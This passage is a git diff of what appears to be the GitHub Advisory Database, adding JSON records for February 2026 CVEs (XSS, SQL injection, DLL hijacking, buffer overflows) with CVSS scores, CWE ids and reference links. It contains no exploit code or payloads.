"2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27324" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27324" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json new file mode 100644 index 0000000000000..4519f57b02b0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p922-cfp2-x9v3", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27319" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27319" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json new file mode 100644 index 0000000000000..0f9646a7052d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4rx-r6r4-5c2v", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27317" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27317" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json new file mode 100644 index 0000000000000..2727785fe1b40 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hp-9h4v-r2fg", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27322" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27322" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json new file mode 100644 index 0000000000000..432445d29590e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr9x-74ff-qxqp", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27318" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27318" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file From 86b286164dd79593d644908a455050cd531d3894 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 09:32:45 +0000 Subject: [PATCH 04/77] Publish Advisories GHSA-3pj6-82hg-m85c GHSA-5rxr-34pc-59ph GHSA-73q4-fmxg-jffc GHSA-cf6f-74jc-gm3q GHSA-xw2v-8hw2-2rc4 --- .../GHSA-3pj6-82hg-m85c.json | 6 ++- .../GHSA-5rxr-34pc-59ph.json | 44 ++++++++++++++++ .../GHSA-73q4-fmxg-jffc.json | 52 +++++++++++++++++++ .../GHSA-cf6f-74jc-gm3q.json | 38 ++++++++++++++ .../GHSA-xw2v-8hw2-2rc4.json | 44 ++++++++++++++++ 5 files changed, 183 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json create mode 100644 advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json diff --git a/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json index 6b71510297b7a..7142e40db226f 100644 --- a/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json +++ b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3pj6-82hg-m85c", - "modified": "2026-02-18T00:30:16Z", + "modified": "2026-02-20T09:31:21Z", "published": "2026-02-18T00:30:16Z", "aliases": [ "CVE-2026-2629" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/jishi/node-sonos-http-api/issues/915" }, + { + "type": "WEB", + "url": "https://github.com/XavLimSG/Vulnerability-Research/blob/main/CVE-2026-2629/CVE-2026-2629.md" + }, { "type": "WEB", "url": "https://github.com/jishi/node-sonos-http-api" diff --git a/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json b/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json new file mode 100644 index 0000000000000..5baf33f01c813 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rxr-34pc-59ph", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26050" + ], + "details": "The installer for ジョブログ集計/分析ソフトウェア RICOHジョブログ集計ツール versions prior to Ver.1.3.7 contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with administrative privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26050" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN69531868" + }, + { + "type": "WEB", + "url": "https://support.ricoh.com/bbv2/html/dr_ut_d/ut/history/w/bb/pub_j/dr_ut_d/4101031/4101031555/V137/5260588/260588/history.htm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T09:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json b/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json new file mode 100644 index 0000000000000..b6a817afe2a25 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73q4-fmxg-jffc", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-2825" + ], + "details": "A vulnerability has been found in rachelos WeRSS we-mp-rss up to 1.4.8. This impacts the function fix_html of the file tools/fix.py of the component Article Module. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2825" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346950" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346950" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753879" + }, + { + "type": "WEB", + "url": "https://www.notion.so/WeRSS-Stored-Cross-Site-Scripting-XSS-in-Article-module-300ea92a3c4180be87dffca6b47d17f7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T07:16:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json new file mode 100644 index 0000000000000..728e7288599ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf6f-74jc-gm3q", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2025-59819" + ], + "details": "This vulnerability allows authenticated attackers to read an arbitrary file by changing a filepath parameter into an internal system path.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59819" + }, + { + "type": "WEB", + "url": "https://wiki.zenitel.com/wiki/AlphaCom_13.02_-_Release_Notes" + }, + { + "type": "WEB", + "url": "https://www.zenitel.com/sites/default/files/2025-12/A100K12333%20Zenitel%20Security%20Advisory.pdf" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T08:17:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json new file mode 100644 index 0000000000000..a5aca835cc3f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw2v-8hw2-2rc4", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26370" + ], + "details": "WordPress Plugin \"Survey Maker\" versions 5.1.7.7 and prior contain a cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26370" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN20049394" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/survey-maker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T08:17:03Z" + } +} \ No newline at end of file From 7b0594e6433ca1f7de318459cf8f9e06f8f903dc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 12:32:50 +0000 Subject: [PATCH 05/77] Publish Advisories GHSA-4jf6-4wfh-g46g GHSA-w4wv-h996-6v9c --- .../GHSA-4jf6-4wfh-g46g.json | 36 +++++++++++++++++ .../GHSA-w4wv-h996-6v9c.json | 40 +++++++++++++++++++ 2 files changed, 76 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json diff --git a/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json b/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json new file mode 100644 index 0000000000000..74e6bbe79fedf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jf6-4wfh-g46g", + "modified": "2026-02-20T12:31:25Z", + "published": "2026-02-20T12:31:25Z", + "aliases": [ + "CVE-2025-10970" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kolay Software Inc. Talentics allows Blind SQL Injection.This issue affects Talentics: through 20022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10970" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0081" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T12:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json new file mode 100644 index 0000000000000..f6d73b0c01487 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4wv-h996-6v9c", + "modified": "2026-02-20T12:31:25Z", + "published": "2026-02-20T12:31:25Z", + "aliases": [ + "CVE-2026-2486" + ], + "details": "The Master Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ma_el_bh_table_btn_text' parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2486" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461745/master-addons/tags/2.1.2/addons/ma-business-hours/ma-business-hours.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78c2621-afff-40b4-ae45-831b2b847756?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T12:16:16Z" + } +} \ No newline at end of file From f9e9f64e636d8ec96d0d68aca1ed30a91376405a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 15:32:30 +0000 Subject: [PATCH 06/77] Publish Advisories GHSA-2m3f-m6mg-cvqf GHSA-3453-mrqq-23pm GHSA-4v8p-q39m-4pj8 GHSA-5jg4-px58-ghq6 GHSA-7cp9-3m8m-4jv3 GHSA-8fxh-mvg9-6cmm GHSA-cg7h-phwj-q3qc GHSA-j59q-24q8-ggc7 GHSA-p97j-p47c-p6g9 GHSA-pqh8-xq2x-mwg2 GHSA-qvhf-98cj-8779 GHSA-v8wf-h34r-55f7 GHSA-w8hr-79rx-368j GHSA-wc6r-7g4j-c7x4 --- .../GHSA-2m3f-m6mg-cvqf.json | 36 +++++++++++++++++++ .../GHSA-3453-mrqq-23pm.json | 6 +++- .../GHSA-4v8p-q39m-4pj8.json | 3 +- .../GHSA-5jg4-px58-ghq6.json | 15 +++++--- .../GHSA-7cp9-3m8m-4jv3.json | 36 +++++++++++++++++++ .../GHSA-8fxh-mvg9-6cmm.json | 11 ++++-- .../GHSA-cg7h-phwj-q3qc.json | 6 +++- .../GHSA-j59q-24q8-ggc7.json | 6 +++- .../GHSA-p97j-p47c-p6g9.json | 11 ++++-- .../GHSA-pqh8-xq2x-mwg2.json | 15 +++++--- .../GHSA-qvhf-98cj-8779.json | 15 +++++--- .../GHSA-v8wf-h34r-55f7.json | 36 +++++++++++++++++++ .../GHSA-w8hr-79rx-368j.json | 6 +++- .../GHSA-wc6r-7g4j-c7x4.json | 36 +++++++++++++++++++ 14 files changed, 215 insertions(+), 23 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json diff --git a/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json b/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json new file mode 100644 index 0000000000000..72ba4c94c7056 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m3f-m6mg-cvqf", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2025-14055" + ], + "details": "An integer underflow vulnerability in Silicon Labs Secure NCP host implementation allows a buffer overread via a specially crafted packet.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14055" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/068Vm00000gvJlq" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json b/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json index c594e1d79cb1c..8426d6bf1a1b3 100644 --- a/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json +++ b/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3453-mrqq-23pm", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26337" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26337" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json index 9197d31f0a4f7..80f86e29bfc26 100644 --- a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json +++ b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-200" + "CWE-200", + "CWE-22" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json index 45b9c46c02bb7..5d9530036ed73 100644 --- a/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json +++ b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5jg4-px58-ghq6", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:13Z", "aliases": [ "CVE-2026-26736" ], "details": "TOTOLINK A3002RU_V3 V3.0.0-B20220304.1804 was discovered to contain a stack-based buffer overflow via the static_ipv6 parameter in the formIpv6Setup function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json b/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json new file mode 100644 index 0000000000000..2841be022befd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cp9-3m8m-4jv3", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2025-14547" + ], + "details": "An integer underflow vulnerability is present in Silicon Lab’s implementation of PSA Crypto and SE Manager EC-JPAKE APIs during ZKP parsing. Triggering the underflow can lead to a hard fault, causing a temporary denial of service.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14547" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/068Vm00000e1UTF" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json b/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json index d9d66f14eecda..fee0410af57e9 100644 --- a/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json +++ b/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8fxh-mvg9-6cmm", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-27094" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GoDaddy CoBlocks coblocks allows Stored XSS.This issue affects CoBlocks: from n/a through <= 3.1.16.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:28Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json b/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json index c6a51bebaadbb..ee0585d5cbe92 100644 --- a/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json +++ b/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cg7h-phwj-q3qc", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26338" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26338" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json b/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json index a7ce5ad2a37bf..9dfa933e455e0 100644 --- a/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json +++ 